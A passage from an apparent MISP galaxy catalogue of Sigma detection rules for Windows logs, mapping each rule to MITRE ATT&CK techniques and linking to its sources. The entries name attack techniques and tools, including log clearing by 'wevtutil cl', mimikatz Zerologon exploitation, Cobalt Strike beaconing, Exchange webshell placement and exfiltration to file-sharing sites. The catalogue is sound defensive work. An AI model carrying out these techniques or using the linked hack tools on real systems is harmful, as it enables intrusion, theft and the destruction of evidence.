  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9230. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml

Tap Driver Installation

Detects a well-known TAP software installation, a possible preparation for data exfiltration using tunnelling techniques

The tag is: misp-galaxy:sigma-rules="Tap Driver Installation"

Tap Driver Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 9231. Table References

Links

https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml

Service Installation with Suspicious Folder Pattern

Detects service installation with suspicious folder patterns

The tag is: misp-galaxy:sigma-rules="Service Installation with Suspicious Folder Pattern"

Service Installation with Suspicious Folder Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9232. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml

Remote Utilities Host Service Install

Detects Remote Utilities Host service installation on the target system.

The tag is: misp-galaxy:sigma-rules="Remote Utilities Host Service Install"

Table 9233. Table References

Links

https://www.remoteutilities.com/support/kb/host-service-won-t-start/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml

Eventlog Cleared

One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution

The tag is: misp-galaxy:sigma-rules="Eventlog Cleared"

Eventlog Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 9234. Table References

Links

https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100

https://twitter.com/deviouspolack/status/832535435960209408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml

Important Windows Eventlog Cleared

Detects the clearing of one of the Windows core event logs, e.g. caused by "wevtutil cl" command execution

The tag is: misp-galaxy:sigma-rules="Important Windows Eventlog Cleared"

Important Windows Eventlog Cleared has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

Table 9235. Table References

Links

https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100

https://twitter.com/deviouspolack/status/832535435960209408

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml

Zerologon Exploitation Using Well-known Tools

This rule is designed to detect attempts to exploit the Zerologon (CVE-2020-1472) vulnerability using the mimikatz zerologon module or other exploits from a machine with the "kali" hostname.

The tag is: misp-galaxy:sigma-rules="Zerologon Exploitation Using Well-known Tools"

Zerologon Exploitation Using Well-known Tools has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 9236. Table References

Links

https://www.secura.com/blog/zero-logon

https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml

Vulnerable Netlogon Secure Channel Connection Allowed

Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.

The tag is: misp-galaxy:sigma-rules="Vulnerable Netlogon Secure Channel Connection Allowed"

Vulnerable Netlogon Secure Channel Connection Allowed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Abuse Elevation Control Mechanism - T1548" with estimative-language:likelihood-probability="almost-certain"

Table 9237. Table References

Links

https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_vul_cve_2020_1472.yml

Sysmon Application Crashed

Detects application popup reporting a failure of the Sysmon service

The tag is: misp-galaxy:sigma-rules="Sysmon Application Crashed"

Sysmon Application Crashed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9238. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml

KDC RC4-HMAC Downgrade CVE-2022-37966

Detects the exploitation of a security bypass and elevation of privilege vulnerability in authentication negotiation by using weak RC4-HMAC negotiation

The tag is: misp-galaxy:sigma-rules="KDC RC4-HMAC Downgrade CVE-2022-37966"

Table 9239. Table References

Links

https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml

Certificate Use With No Strong Mapping

Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID). This could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping. Events where the AccountName and the CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.

The tag is: misp-galaxy:sigma-rules="Certificate Use With No Strong Mapping"

Table 9240. Table References

Links

https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml

DHCP Server Loaded the CallOut DLL

This rule detects a DHCP server in which a Callout DLL specified in the registry was loaded

The tag is: misp-galaxy:sigma-rules="DHCP Server Loaded the CallOut DLL"

DHCP Server Loaded the CallOut DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9241. Table References

Links

https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx

https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html

https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml

DHCP Server Error Failed Loading the CallOut DLL

This rule detects a DHCP server error in which a Callout DLL specified in the registry could not be loaded

The tag is: misp-galaxy:sigma-rules="DHCP Server Error Failed Loading the CallOut DLL"

DHCP Server Error Failed Loading the CallOut DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9242. Table References

Links

https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx

https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html

https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml

Suspicious Digital Signature Of AppX Package

Detects execution of AppX packages with a known suspicious or malicious signature

The tag is: misp-galaxy:sigma-rules="Suspicious Digital Signature Of AppX Package"

Table 9243. Table References

Links

Internal Research

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml

HybridConnectionManager Service Running

Rule to detect the Hybrid Connection Manager service running on an endpoint.

The tag is: misp-galaxy:sigma-rules="HybridConnectionManager Service Running"

HybridConnectionManager Service Running has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Client Software Binary - T1554" with estimative-language:likelihood-probability="almost-certain"

Table 9244. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/servicebus/win_hybridconnectionmgr_svc_running.yml

Unsigned Binary Loaded From Suspicious Location

Detects Code Integrity (CI) engine blocking processes from loading unsigned DLLs residing in suspicious locations

The tag is: misp-galaxy:sigma-rules="Unsigned Binary Loaded From Suspicious Location"

Unsigned Binary Loaded From Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9245. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/45fd5be71a51aa518b1b36d4e1f36af498084e27/ETWEventsList/CSV/Windows11/21H2/W11_21H2_Pro_20220719_22000.795/Providers/Microsoft-Windows-Security-Mitigations.csv

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_unsigned_dll_from_susp_location.yml

Microsoft Defender Blocked from Loading Unsigned DLL

Detects the Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs, which may be an attempt to sideload an arbitrary DLL

The tag is: misp-galaxy:sigma-rules="Microsoft Defender Blocked from Loading Unsigned DLL"

Microsoft Defender Blocked from Loading Unsigned DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9246. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security_mitigations/win_security_mitigations_defender_load_unsigned_dll.yml

WMI Persistence

Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.

The tag is: misp-galaxy:sigma-rules="WMI Persistence"

WMI Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9247. Table References

Links

https://twitter.com/mattifestation/status/899646620148539397

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml

DNS Query for Anonfiles.com Domain - DNS Client

Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes

The tag is: misp-galaxy:sigma-rules="DNS Query for Anonfiles.com Domain - DNS Client"

DNS Query for Anonfiles.com Domain - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9248. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml

DNS Query To MEGA Hosting Website - DNS Client

Detects DNS queries for subdomains related to the MEGA sharing website

The tag is: misp-galaxy:sigma-rules="DNS Query To MEGA Hosting Website - DNS Client"

DNS Query To MEGA Hosting Website - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9249. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_mega_nz.yml

Query Tor Onion Address - DNS Client

Detects DNS resolution of a .onion address related to the Tor routing network

The tag is: misp-galaxy:sigma-rules="Query Tor Onion Address - DNS Client"

Query Tor Onion Address - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"

Table 9250. Table References

Links

https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_tor_onion.yml

DNS Query To Ufile.io - DNS Client

Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration

The tag is: misp-galaxy:sigma-rules="DNS Query To Ufile.io - DNS Client"

DNS Query To Ufile.io - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 9251. Table References

Links

https://thedfirreport.com/2021/12/13/diavol-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client_ufile_io.yml

Suspicious Cobalt Strike DNS Beaconing - DNS Client

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

The tag is: misp-galaxy:sigma-rules="Suspicious Cobalt Strike DNS Beaconing - DNS Client"

Suspicious Cobalt Strike DNS Beaconing - DNS Client has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 9252. Table References

Links

https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/

https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_clientmal_cobaltstrike.yml

File Was Not Allowed To Run

Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.

The tag is: misp-galaxy:sigma-rules="File Was Not Allowed To Run"

File Was Not Allowed To Run has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9253. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker

https://nxlog.co/documentation/nxlog-user-guide/applocker.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml

Potential Active Directory Reconnaissance/Enumeration Via LDAP

Detects potential Active Directory enumeration via LDAP

The tag is: misp-galaxy:sigma-rules="Potential Active Directory Reconnaissance/Enumeration Via LDAP"

Potential Active Directory Reconnaissance/Enumeration Via LDAP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

Table 9254. Table References

Links

https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c

https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1

https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs

https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726

https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml

Suspicious AppX Package Installation Attempt

Detects an AppX package installation with the error code "0x80073cff", which indicates that the package did not meet the signing requirements and could be suspicious

The tag is: misp-galaxy:sigma-rules="Suspicious AppX Package Installation Attempt"

Table 9258. Table References

Links

https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/

https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting

Internal Research

https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml

Remove Exported Mailbox from Exchange Webserver

Detects removal of an exported Exchange mailbox, which could be done to cover tracks from a ProxyShell exploit

The tag is: misp-galaxy:sigma-rules="Remove Exported Mailbox from Exchange Webserver"

Remove Exported Mailbox from Exchange Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 9262. Table References

Links

https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/modules/exploits/windows/http/exchange_proxyshell_rce.rb#L430

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_remove_mailbox_export.yml

Exchange Set OabVirtualDirectory ExternalUrl Property

Rule to detect an adversary setting the OabVirtualDirectory ExternalUrl property to a script, as recorded in the Exchange Management log

The tag is: misp-galaxy:sigma-rules="Exchange Set OabVirtualDirectory ExternalUrl Property"

Exchange Set OabVirtualDirectory ExternalUrl Property has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9263. Table References

Links

https://twitter.com/OTR_Community/status/1371053369071132675

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml

Failed MSExchange Transport Agent Installation

Detects a failed installation of an Exchange Transport Agent

The tag is: misp-galaxy:sigma-rules="Failed MSExchange Transport Agent Installation"

Failed MSExchange Transport Agent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"

Table 9264. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent_failed.yml

ProxyLogon MSExchange OabVirtualDirectory

Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory

The tag is: misp-galaxy:sigma-rules="ProxyLogon MSExchange OabVirtualDirectory"

ProxyLogon MSExchange OabVirtualDirectory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 9265. Table References

Links

https://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxylogon_oabvirtualdir.yml

Certificate Request Export to Exchange Webserver

Detects a write of an Exchange CSR to an untypical directory or with an aspx name suffix, which can be used to place a webshell

The tag is: misp-galaxy:sigma-rules="Certificate Request Export to Exchange Webserver"

Certificate Request Export to Exchange Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9266. Table References

Links

https://twitter.com/GossiTheDog/status/1429175908905127938

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml

Mailbox Export to Exchange Webserver

Detects a successful export of an Exchange mailbox to an untypical directory or with an aspx name suffix, which can be used to place a webshell, or the role assignment needed for it

The tag is: misp-galaxy:sigma-rules="Mailbox Export to Exchange Webserver"

Mailbox Export to Exchange Webserver has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9267. Table References

Links

https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_proxyshell_mailbox_export.yml

MSExchange Transport Agent Installation - Builtin

Detects the installation of an Exchange Transport Agent

The tag is: misp-galaxy:sigma-rules="MSExchange Transport Agent Installation - Builtin"

MSExchange Transport Agent Installation - Builtin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002" with estimative-language:likelihood-probability="almost-certain"

Table 9268. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/msexchange/win_exchange_transportagent.yml

Exports Registry Key To an Alternate Data Stream

Detects the export of the target Registry key hidden in the specified alternate data stream.

The tag is: misp-galaxy:sigma-rules="Exports Registry Key To an Alternate Data Stream"

Exports Registry Key To an Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9269. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml

Potentially Suspicious File Download From ZIP TLD

Detects the download of a file with a potentially suspicious extension from a .zip top level domain.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious File Download From ZIP TLD"

Table 9270. Table References

Links

https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/

https://twitter.com/cyb3rops/status/1659175181695287297

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml

Unusual File Download From File Sharing Websites

Detects the download of a suspicious file type from a well-known file and paste sharing domain

The tag is: misp-galaxy:sigma-rules="Unusual File Download From File Sharing Websites"

Unusual File Download From File Sharing Websites has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9271. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml

HackTool Named File Stream Created

Detects the creation of a named file stream with the imphash of a well-known hack tool

The tag is: misp-galaxy:sigma-rules="HackTool Named File Stream Created"

HackTool Named File Stream Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9272. Table References

Links

https://github.com/xuanxuan0/DripLoader

https://github.com/antonioCoco/RoguePotato

https://github.com/outflanknl/Dumpert

https://www.tarasco.org/security/pwdump_7/

https://github.com/ohpe/juicy-potato

https://github.com/codewhitesec/HandleKatz

https://github.com/topotam/PetitPotam

https://github.com/gentilkiwi/mimikatz

https://github.com/hfiref0x/UACME

https://github.com/wavestone-cdt/EDRSandblast

https://github.com/fortra/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml

Creation Of a Suspicious ADS File Outside a Browser Download

Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers

The tag is: misp-galaxy:sigma-rules="Creation Of a Suspicious ADS File Outside a Browser Download"

Table 9273. Table References

Links

https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_creation_internet_file.yml

Suspicious File Download From File Sharing Websites

Detects the download of a suspicious file type from a well-known file and paste sharing domain

The tag is: misp-galaxy:sigma-rules="Suspicious File Download From File Sharing Websites"

Suspicious File Download From File Sharing Websites has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9274. Table References

Links

https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml

Unusual File Download from Direct IP Address

Detects the download of a suspicious file type from URLs that use a raw IP address instead of a hostname

The tag is: misp-galaxy:sigma-rules="Unusual File Download from Direct IP Address"

Unusual File Download from Direct IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9275. Table References

Links

https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md

https://labs.withsecure.com/publications/detecting-onenote-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml

Potential Suspicious Winget Package Installation

Detects a potentially suspicious winget package installation from a suspicious source.

The tag is: misp-galaxy:sigma-rules="Potential Suspicious Winget Package Installation"

Table 9276. Table References

Links

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml

Hidden Executable In NTFS Alternate Data Stream

Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash

The tag is: misp-galaxy:sigma-rules="Hidden Executable In NTFS Alternate Data Stream"

Hidden Executable In NTFS Alternate Data Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9277. Table References

Links

https://twitter.com/0xrawsec/status/1002478725605273600?s=21

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_ads_executable.yml

Office Application Startup - Office Test

Detects the addition of the Office Test registry key, which allows a user to specify an arbitrary DLL that will be executed every time an Office application is started

The tag is: misp-galaxy:sigma-rules="Office Application Startup - Office Test"

Office Application Startup - Office Test has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Test - T1137.002" with estimative-language:likelihood-probability="almost-certain"

Table 9278. Table References

Links

https://unit42.paloaltonetworks.com/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml

RedMimicry Winnti Playbook Registry Manipulation

Detects actions caused by the RedMimicry Winnti playbook

The tag is: misp-galaxy:sigma-rules="RedMimicry Winnti Playbook Registry Manipulation"

RedMimicry Winnti Playbook Registry Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9279. Table References

Links

https://redmimicry.com

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml

Suspicious Camera and Microphone Access

Detects processes accessing the camera and microphone from a suspicious folder

The tag is: misp-galaxy:sigma-rules="Suspicious Camera and Microphone Access"

Suspicious Camera and Microphone Access has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Video Capture - T1125" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 9280. Table References

Links

https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_mic_cam_access.yml

Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

The tag is: misp-galaxy:sigma-rules="Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback"

Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9281. Table References

Links

